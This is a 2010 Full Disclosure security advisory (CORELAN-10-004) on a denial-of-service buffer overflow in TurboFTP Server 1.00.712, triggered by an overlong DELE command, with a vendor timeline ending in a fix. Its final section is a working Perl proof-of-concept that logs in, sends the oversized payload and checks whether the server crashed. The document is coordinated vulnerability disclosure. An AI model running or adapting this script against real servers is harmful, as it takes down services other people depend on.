Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

[CORELAN-10-004] TurboFTP Server 1.00.712 remote DoS
From: Security <security () corelan be>
Date: Tue, 12 Jan 2010 20:25:54 +0100

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security () corelan be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/


0x00 : Vulnerability information
--------------------------------

[*] Product : Turbo FTP Server
[*] Version : 1.00.712 
[*] Vendor : turbosoft inc
[*] URL : http://www.tbsoftinc.com
[*] Platform : Windows
[*] Type of vulnerability : Buffer overflow - DoS
[*] Risk rating : Medium
[*] Issue fixed in version : 1.00.720
[*] Vulnerability discovered by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
[*] Greetings to : EdiStrosar, rick2600, mr_me, ekse & MarkoT from Corelan Team


0x01 : Vendor description of software
-------------------------------------
From the vendor website:

TurboFTP Server is a high performance, secure, scalable and management 
friendly file transfer server running on Windows platforms. With it you 
can easily set up a secure file transfer server that delivers regular FTP, 
FTP over SSL/TLS, and SFTP over SSH services with virtual domains, 
advanced directory access control, virtual folders, IP access control, 
flexible authentication options and many other features. 



0x02 : Vulnerability details
----------------------------
The "Turbo FTP Server" ftp service is vulnerable to a buffer overflow, 
allowing a malicious person to trigger a Denial Of Service condition
against this service.

In order to trigger the vulnerability, the remote client needs to be able
to login and issue an specially crafted DELE command.

Note that other commands may be vulnerable too.




0x03 : Vendor communication
---------------------------
[*] Dec 30, 2009 : Issue found
[*] Jan 1st, 2010 : contacted vendor
[*] Jan 1st, 2010 : vendor opened support ticket
[*] Jan 4th, 2010 : vendor asked for PoC code
[*] Jan 4th, 2010 : Poc Code sent
[*] Jan 7th, 2010 : Vendor acknowledged issue and starts fixing issue
[*] Jan 11th, 2010 : vendor released fixed version
[*] Jan 12th, 2010 : Public disclosure

Release notes (on Vendor website):

  V 1.00 Build 720 - Jan 11, 2010

  [-] Buffer overflow problems reported by Corelan Team.
  [-] A file open problem causing WinSCP failed to upload files.
  [-] A problem in log recycling causes server to stall. 



0x04 : Exploit/PoC
------------------
# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date          : 30 december 2009
# Author        : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by  : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version       : 1.00.712
# Issue fixed in: 1.00.720
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                       |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

use IO::Socket; 

if ($#ARGV ne 3) { 
print "\n  usage: $0 <targetip> <targetport> <user> <password>\n"; 
exit(0); 
} 

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payload\n";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 

$ftp = <$sock> || die " [!] *** Unable to connect ***\n"; 
print "   ** $ftp";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Logging in (user $user)\n";
print $sock "USER $user\r\n"; 
$ftp = <$sock>;
print "   ** $ftp";
print $sock "PASS $pass\r\n"; 
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Sending payload\n";
print $sock "DELE ".$payload."\r\n";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Payload sent, now checking FTP server state\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 
my $ftp2 = <$sock2> || die " [+] DoS successful\n";
print " [!] DoS did not seem to work\n";
print "   ** $ftp2\n";





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • [CORELAN-10-004] TurboFTP Server 1.00.712 remote DoS Security (Jan 12)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]